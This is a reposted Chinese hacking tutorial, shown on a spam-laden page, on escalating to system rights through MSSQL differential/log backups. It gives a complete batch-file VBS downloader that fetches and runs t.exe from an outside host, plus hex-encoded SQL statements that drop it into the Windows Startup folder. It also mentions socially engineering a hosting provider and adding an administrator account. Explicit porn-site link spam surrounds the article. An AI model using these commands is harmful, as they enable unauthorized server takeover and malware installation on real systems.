亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 數據庫 > SQL Server > 正文

MSSQL差異備份取系統權限的相關軟件下載

2020-07-25 13:38:12
字體:
來源:轉載
供稿:網友
昨天在網上找資料的時間無意進了一個站,糊里糊涂就進去了,想提權提不起來,后來加上服務商的Q號想社工一下,射了半天得知服務器的安全是綠盟的人給做的 安全,后來就問豬豬有什么提權的方法沒,他剛好做了這個動畫就給發來過來,在網上查了一下找到了文章,一起拷貝過來.最近忙著學習很少關注這方面的東西, 落后了,落后了......

下面是是在網上找到的資料和動畫.

 

TEAM里的內部資料放久了,現在不放出來,遲早會有人發掘出來的!既然如此就拿出來大家分享吧!
MSSQL差異備份獲取webshell 幾乎人人皆知,那么我們可以利用差異備份出來的文件 當作惡意代碼
讓系統執行了之后自動提升權限 或者添加管理員嗎? 答案當然可以了,kj021320測試了N次之后跟你說!

那么我們得考慮文件擺放的位置~什么地方系統會運行呢?這個其實算是廢話吧!
大家不用想都知道 通用地方 C:/Documents and Settings/All Users/「開始」菜單/程序/啟動
呵呵位置有了! 那么我們備份什么文件讓系統能執行的呢?
這個是第一個關鍵點~!
EXE  JS  VBS  BAT這些文件大家第一時間想到的了
那些我一個一個來分析 exe的話!絕對能了! 但是 MSSQL差異備份這么多垃圾肯定會把exe弄壞的!
否決掉
然后到腳本
VBS 我們能不能把 他的垃圾信息注釋掉呢? 不然VBS 會執行不了! OK 學過VBS的朋友都知道
VBS里面 有2種注釋 '  還有就是 rem
但是還是會有垃圾信息屏蔽不了
否決掉

JS呢? JS里面有多行注釋的/**/  但是 /* 不可能在首行吧?
否決掉

最后 剩下我們最熟悉的bat批處理了!
OK我們繼續分析 bat里面注釋是什么呢?也是REM,失敗??!之前vbs那里不行 這里的rem注釋也一樣不行的!
那么我們怎么辦呢?其實很簡單! 當我們在CMD下面敲錯了命令系統會怎樣呢?

說到這里 要是大家不往文章下面看也一樣能想到方法了吧~

OK我們繼續探~~這里是最最關鍵點,差異備份出來的垃圾信息我們可以通過用回車把他提交了!
而系統只當作無用的命令來處理!不影響我們的操作!
問題就這樣解決了嗎?不是的!~MSSQL備份的時候,到一定的字符長度就會出現垃圾的字符,那個字符會影響我們的操作!
那么我們得把語句盡量縮少,越少越好~
OK那我們思路好了就采用bat 寫一個VBS的下載者 然后執行這個下載者 最后通過下載者down回來的馬子來獲取系統權限
下面是我改過的生成下載者的BAT

echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs
echo P.Open "GET","http://www.isto.cn/t.exe",0 >>k.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs
echo G.Mode=3:G.Type=1:G.Open() >>k.vbs  
echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs
k.vbs
t

下一個k.VBS然后k.vbs下載一個t.exe文件保存到本地 直接執行
記得記得我說過的代碼前面一定要用回車把垃圾數據提交 最好2以上個回車
然后實現差異備份

alter database ISTO set RECOVERY FULL--
create table cmd (a image)--
backup log ISTO to disk = 'c:/cmd1' with init--
insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D696372

6F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2

022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30

203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D63726561

74654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A65

63686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B

2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64

793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A

6B2E7662730D0A740D0A)--
backup log ISTO to disk = 'C:/Documents and Settings/All Users/「開始」菜單/程序/啟動/1.bat'--
drop table cmd--

OK bat出來了! 至于怎樣讓服務器重啟呢!這個問題遺留給你們去討論吧!
要是服務器直接開啟了3389 那就更方便了! 直接bat 一個添加管理員的命令更爽!

isto是動畫里用到的工具.
isto輔助轉換工具.rar
mssql差異備份取系統權限.rar
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
欧美中文字幕精品| 国产乱人伦真实精品视频| 亚洲xxxx18| 久久精品国产亚洲精品| www.亚洲人.com| 国产精品美女视频网站| 97在线观看免费高清| 日韩一区二区欧美| 精品亚洲精品福利线在观看| 亚洲高清久久网| 亚洲永久免费观看| 欧洲精品毛片网站| 精品久久久久久亚洲精品| 亚洲第一黄色网| 国产精品毛片a∨一区二区三区|国| 国产日产久久高清欧美一区| 亚洲精品美女视频| 不卡中文字幕av| 国产成人小视频在线观看| 欧美日韩一区二区三区| 孩xxxx性bbbb欧美| 国产亚洲欧美另类中文| 尤物精品国产第一福利三区| 欧美超级免费视 在线| 精品性高朝久久久久久久| 国产偷亚洲偷欧美偷精品| 亚洲乱码一区av黑人高潮| 日韩av成人在线观看| 国产成人精品免费久久久久| 亚洲精品免费一区二区三区| 亚洲japanese制服美女| 国产精品福利在线| 热久久99这里有精品| 亚洲天堂一区二区三区| 日韩欧美在线第一页| 日本成人免费在线| 国产欧美精品一区二区三区介绍| 高清欧美性猛交xxxx| 8x海外华人永久免费日韩内陆视频| 国产精品免费网站| 久久久久女教师免费一区| 色偷偷av亚洲男人的天堂| 日本欧美一二三区| 久久久久免费精品国产| 亚洲成人精品久久久| 亚洲人成电影网站色…| 一本大道久久加勒比香蕉| 日韩在线观看免费av| 亚洲第一黄色网| 日本欧美爱爱爱| 操日韩av在线电影| 亚洲xxx视频| 国内外成人免费激情在线视频| 欧美野外wwwxxx| 国产suv精品一区二区三区88区| 日韩av一卡二卡| 日本韩国欧美精品大片卡二| 色偷偷av亚洲男人的天堂| 欧美极度另类性三渗透| 色播久久人人爽人人爽人人片视av| 欧美性猛交xxxx免费看| 欧美视频裸体精品| 亚洲欧美日韩图片| 日韩亚洲欧美中文高清在线| 欧美激情久久久| 日韩影视在线观看| 亚洲桃花岛网站| 国产精品亚洲аv天堂网| 成人免费观看a| 欧美一区二区三区免费视| 777国产偷窥盗摄精品视频| 国产一区二区三区三区在线观看| 成人情趣片在线观看免费| 91精品一区二区| 成人激情视频在线播放| 成人黄在线观看| 精品久久中文字幕久久av| 亚洲欧美日韩成人| 日韩在线视频免费观看| 全亚洲最色的网站在线观看| 81精品国产乱码久久久久久| 久久99久久久久久久噜噜| 亚洲女人天堂色在线7777| 韩国精品美女www爽爽爽视频| 色99之美女主播在线视频| 色综合天天综合网国产成人网| 国产va免费精品高清在线观看| 欧美最猛性xxxx| 日韩有码在线观看| 91视频九色网站| 91影院在线免费观看视频| 91在线高清免费观看| 国产一区二区三区精品久久久| 国产日韩欧美综合| 欧美日韩在线免费观看| 久久国产精品影片| 亚洲午夜精品久久久久久久久久久久| 亚洲国产精品人久久电影| 亚洲一区二区久久久久久久| 欧美大尺度电影在线观看| 亚洲视频在线免费观看| 在线观看精品国产视频| 亚洲成人久久久| 国产美女久久久| 亚洲欧美激情精品一区二区| 九九热在线精品视频| 国产一区二区日韩| 国产一区二区香蕉| 国产亚洲精品日韩| 奇米4444一区二区三区| 海角国产乱辈乱精品视频| 亚洲精品久久久久久久久| 国产精品久久久久久影视| 国产精品丝袜一区二区三区| 欧美在线观看网址综合| 国产又爽又黄的激情精品视频| 中文字幕日韩有码| 国产99视频在线观看| 亚洲人成电影网站色www| 国产69精品久久久久9| 久久综合色影院| 亚洲综合成人婷婷小说| 亚洲精品成人网| 亚洲成人网av| 国产在线观看精品| 91在线观看免费高清完整版在线观看| 久久久久这里只有精品| 欧美电影免费观看| 国产亚洲精品久久久久久牛牛| 欧美性生交大片免网| 亚洲风情亚aⅴ在线发布| 欧美成人手机在线| 亚洲影院色在线观看免费| 亚洲午夜av久久乱码| 亚洲bt天天射| 狠狠久久亚洲欧美专区| 国产一区二区丝袜| 欧洲日韩成人av| 久久精品视频中文字幕| 日韩美女视频免费在线观看| 亚洲精品久久久久久久久久久久久| 亚洲自拍偷拍福利| 久久夜色精品国产亚洲aⅴ| 4p变态网欧美系列| 国产美女精品视频| 亚洲一区二区三区乱码aⅴ蜜桃女| 国产精品免费久久久久久| 精品国产一区二区三区在线观看| 国产精品欧美日韩久久| 成人精品一区二区三区电影免费| 亚洲国产日韩欧美在线动漫| 岛国视频午夜一区免费在线观看| 欧美一级电影久久| 91牛牛免费视频| 欧美日韩国产页| 欧美日韩国产中文精品字幕自在自线| 成人福利网站在线观看11| 日韩精品中文字幕有码专区| 日韩一级裸体免费视频| 色偷偷av一区二区三区乱| 欧美国产日韩一区二区| 91大神在线播放精品| 2019国产精品自在线拍国产不卡| 国产精品久久久亚洲|